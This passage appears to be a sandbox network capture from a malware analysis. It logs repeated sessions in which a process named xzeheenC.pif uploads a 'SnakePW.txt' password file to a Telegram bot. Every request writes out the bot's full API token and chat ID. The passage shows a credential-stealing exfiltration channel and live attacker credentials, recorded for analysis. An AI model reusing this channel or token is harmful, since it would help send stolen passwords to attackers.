                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419206,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535932,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        95 | 192.168.2.8 | 49873 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:32:12 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd231ab10327a5
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:32:12 UTC | 535 | OUT | Data Ascii: --------------------------8dd231ab10327a5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:32:13 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:12 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:13 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419208,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535932,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.8 | 49878 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:13 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd22799af3df8b
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:13 UTC | 535 | OUT | Data Ascii: --------------------------8dd22799af3df8bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:32:13 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:13 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:13 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419210,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535933,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.8 | 49879 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:13 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd21b1a0691632
Host: api.telegram.org
Content-Length: 535
Connection: Keep-Alive
2024-12-18 15:32:13 UTC | 535 | OUT | Data Ascii: --------------------------8dd21b1a0691632Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:14 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:13 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:14 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419212,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535933,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.8 | 49881 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:14 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2362215e27d7
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:14 UTC | 535 | OUT | Data Ascii: --------------------------8dd2362215e27d7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:32:15 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:14 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:15 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419214,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535934,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.8 | 49882 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:15 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd22aae7254cb3
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:15 UTC | 535 | OUT | Data Ascii: --------------------------8dd22aae7254cb3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:32:15 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:15 GMT
Content-Type: application/json
Content-Length: 517
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:15 UTC | 517 | IN | Data Ascii: {"ok":true,"result":{"message_id":419216,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535935,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.8 | 49887 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:15 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd21d54c9e0a5c
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:15 UTC | 535 | OUT | Data Ascii: --------------------------8dd21d54c9e0a5cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:16 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:15 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:16 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419218,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535935,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.8 | 49889 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:16 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd23af6eeb12b8
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:16 UTC | 535 | OUT | Data Ascii: --------------------------8dd23af6eeb12b8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:32:16 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:16 GMT
Content-Type: application/json
Content-Length: 517
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:16 UTC | 517 | IN | Data Ascii: {"ok":true,"result":{"message_id":419220,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535936,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.8 | 49890 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:17 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd22de9ba98f31
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:17 UTC | 535 | OUT | Data Ascii: --------------------------8dd22de9ba98f31Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:32:17 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:17 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:17 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419222,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535937,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.8 | 49895 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:17 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd21f79a600637
Host: api.telegram.org
Content-Length: 535
Connection: Keep-Alive
2024-12-18 15:32:17 UTC | 535 | OUT | Data Ascii: --------------------------8dd21f79a600637Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:18 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:17 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:18 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419224,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535937,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.8 | 49897 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:18 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd24077f7c4b2d
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:18 UTC | 535 | OUT | Data Ascii: --------------------------8dd24077f7c4b2dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:32:19 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:18 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:19 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419226,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535938,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.8 | 49898 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:19 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd231c021e891b
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:19 UTC | 535 | OUT | Data Ascii: --------------------------8dd231c021e891bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:32:19 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:19 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:19 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419228,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535939,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.8 | 49900 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:19 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd221edce7d449
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:19 UTC | 535 | OUT | Data Ascii: --------------------------8dd221edce7d449Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:20 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:19 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:20 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419230,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535939,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.8 | 49905 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:20 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd246a28398923
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:20 UTC | 535 | OUT | Data Ascii: --------------------------8dd246a28398923Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:32:21 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:20 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:21 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 34 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419232,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535940,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.8 | 49906 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:21 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2370c4ba52f1
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:21 UTC | 535 | OUT | Data Ascii: --------------------------8dd2370c4ba52f1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:32:21 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:21 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:21 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419234,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535941,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.8 | 49908 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:21 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd224ec822fa72
Host: api.telegram.org
Content-Length: 535
Connection: Keep-Alive
2024-12-18 15:32:21 UTC | 535 | OUT | Data Ascii: --------------------------8dd224ec822fa72Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:32:22 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:21 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:22 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419236,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535941,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.8 | 49913 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:22 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd24d2b90dc0e1
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:22 UTC | 535 | OUT | Data Ascii: --------------------------8dd24d2b90dc0e1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:32:22 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:22 GMT
Content-Type: application/json
Content-Length: 513
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:22 UTC | 513 | IN | Data Ascii: {"ok":true,"result":{"message_id":419238,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535942,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.8 | 49914 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:32:23 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd23bc8169851c
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:32:23 UTC | 535 | OUT | Data Ascii: --------------------------8dd23bc8169851cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:32:23 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:32:23 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:32:23 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419240,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535943,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.8 | 49915 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
